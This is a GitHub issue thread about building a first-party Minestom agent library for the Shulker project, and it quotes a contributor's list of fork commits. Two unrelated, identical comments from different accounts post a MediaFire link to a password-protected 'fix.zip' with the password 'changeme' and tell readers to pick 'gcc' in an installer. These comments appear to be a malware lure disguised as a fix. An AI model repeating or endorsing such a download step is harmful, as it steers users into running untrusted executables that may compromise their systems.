### ISSUE TITLE
Create first-party Minestom agent library

### ISSUE THREAD

**Issue by jeremylvln** [jeremylvln/Shulker#633]
### Discussed in https://github.com/jeremylvln/Shulker/discussions/362

The idea here is not to create a Minestom agent plugin, but rather a library people can then include in their server build. This would help avoid hacks integrating Shulker to Minestom manually.

<div type='discussions-op-text'>

<sup>Originally posted by **TropicalShadow** January 24, 2024</sup>
Hi, I am looking at integrating [Minestom](https://minestom.net/) \([GitHub](https://github.com/Minestom/Minestom)\) into this project. 

I have attempted implementing these changes in my fork [BridgeSplash Fork](https://github.com/BridgeSplash/Shulker) 

here is a rough list of features/fixes I added to my fork:

- Custom Plugin Folder Location [Commit](https://github.com/BridgeSplash/Shulker/commit/5f602b4d164b23520126a972564f6423538a1dbb)
- Custom Server Interface, edited Logging for Servers [Commit](https://github.com/BridgeSplash/Shulker/commit/1e1add3226d82744331bdb67ff8616a62d7bb2ae)
- Fixed .gitignore for gradle auto-import [Commit](https://github.com/BridgeSplash/Shulker/commit/d57c7c29f2ad0af3f15256b660455f61bc9d6a55)

all commits can be found [here](https://github.com/BridgeSplash/Shulker/commits/main/)

_Note:_ I still need to test that the changes work with no issue

Sorry if this is posted to the wrong section, was unsure where to post.
hope this can help, and I am happy to tweak or change it if needed.
Thank you, 
Tropical.</div>

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jeremylvln** [comment]
Reopening until feature is confirmed to work properly
